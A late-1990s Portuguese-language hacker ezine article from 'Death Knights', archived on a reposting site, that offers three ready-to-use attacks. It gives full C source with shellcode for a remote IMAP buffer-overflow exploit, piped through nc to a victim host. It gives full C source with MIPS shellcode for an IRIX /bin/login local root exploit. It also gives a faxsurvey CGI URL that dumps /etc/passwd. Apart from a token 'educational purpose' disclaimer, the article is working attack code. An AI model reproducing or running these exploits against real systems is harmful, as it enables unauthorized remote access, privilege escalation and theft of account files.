Copy Link
Add to Bookmark
Report

Exploits - CGI & Stuff

Death Knights Issue 4

eZine's profile picture
Published in 
Death Knights
 · 2 years ago

by ReNeGaDe

Mais uma para voces! Para tentar um exploit, e' melhor ter uma conta no seu alvo (se possivel). Aqui irao alguns poucos exploits pra voce se divertir! E tambem ah falha de cgi para get passwd do faxsurvey.


1) Exploit para novo bug do imap..

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/*
* Here goes another imap remote exploit
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* hey kiddies, it's 4 linux ! :)
* play around but be nice and careful - test it only against your own machine
* this code is only for educational purpose.
*
* renegade:~# (./imaprulez 100; cat) | nc victim.org 143
* (you can provide an offset or use the default 100)
*
* thanks for c0nd0r - condor@uground.org
*
* this code is heavly based on Cheez Whiz code
* So give him the credit : cheezbeast@hotmail.com
* I just found out the esp and fix things up
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)
#define NOP 0x90

char shell[] =
"\xeb\x34\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x7f"
"\x20\x46\x01\x20\x46\x02\x20\x46\x03\x20\x46\x05\x20\x46\x06"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc7\xff\xff\xff"
"\x2f\xe2\xe9\xee\x2f\xf3\xe8\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

void
main (int argc, char *argv[])
{
int i;

nop = 403; offset = 100;
if (argc > 2) nop = atoi(argv[2]);
if (argc > 1) offset = atoi(argv[1]);
esp = 0xbffff501;

memset(buf, NOP, BUFLEN);
memcpy(buf+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
*((int *) &buf[i]) = esp + offset;

printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");

return;
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

2) Um buffer overflow para voce! Em /bin/login.

O que acontece usuarios locais podem pegar root access. Sistemas vulneraveis Irix 5.3 Irix64 6.2 Irix 6.3.
Solucao temporaria: chmod u-s /bin/login
Compile o exploit usando '-n32' flag pra compiling under 6.x

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

/* /bin/login exploit by DCRH 24/5/97
*
* The Death Knights www.deathknights.com
* by ReNeGaDe - ReNeGaDe@DeathKnights.com
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};

u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* addi $4,$31,264+36 */
0xa086feff, /* sb $6,-264+7($4) */
0x2084fef8, /* sub $4,264 */
0x20850110, /* addi $5,$4,264+8 */
0xaca4fef8, /* sw $4,-264($5) */
0xaca6fefc, /* sw $4,-260($5) */
0x20a5fef8, /* sub $5, 264 */
0x240203f3, /* li $v0,1011 */
0x03ffffcc, /* syscall 0xfffff */
0x2f62696e, /* "/bin" */
0x2f7368ff, /* "/sh" */
};

char buf[BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
char *env[] = {NULL};
u_long targ_addr, stack;
u_long *long_p;
int i, code_length = strlen((char *)irix_shellcode)+1;
u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

stack = get_sp();

long_p =(u_long *) buf;
targ_addr = stack + OFFSET;

if (argc > 1)
targ_addr += atoi(argv[1]);

while ((targ_addr & 0xff000000) == 0 ||
(targ_addr & 0x00ff0000) == 0 ||
(targ_addr & 0x0000ff00) == 0 ||
(targ_addr & 0x000000ff) == 0)
targ_addr += 4;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = IRIX_NOP;

for (i = 0; i < code_length/sizeof(u_long); i++)
*long_p++ = irix_shellcode[i];

for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = (targ_addr << 24) | (targ_addr >> 8);

*long_p = 0;

printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

execle("/bin/login", "login", "-h", &buf[1], 0, env);
perror("execl failed");
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

3) Falha de cgi no 'faxsurvey' CGI-Script...

"http://vitima.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd"

Eh isso ae pessoal aqui se encerram minhas materias nessa TDK!

Se tiverem interesse em tirar duvidas ou apresentar novas ideias, aqui estah o meu email. Mais sem babozeiras hein pessoal vamos ter um bom senso pois nao sou desocupado.

cya l8er!

ReNeGaDe               renegade@deathknights.com 
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'`'`

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Francesco's profile picture
Francesco Arca (@Francesco)
14 Nov 2024
Congratulations :)

guest's profile picture
@guest
12 Nov 2024
It is very remarkable that the period of Atlantis’s destruction, which occurred due to earthquakes and cataclysms, coincides with what is co ...

guest's profile picture
@guest
12 Nov 2024
Plato learned the legend through his older cousin named Critias, who, in turn, had acquired information about the mythical lost continent fr ...

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT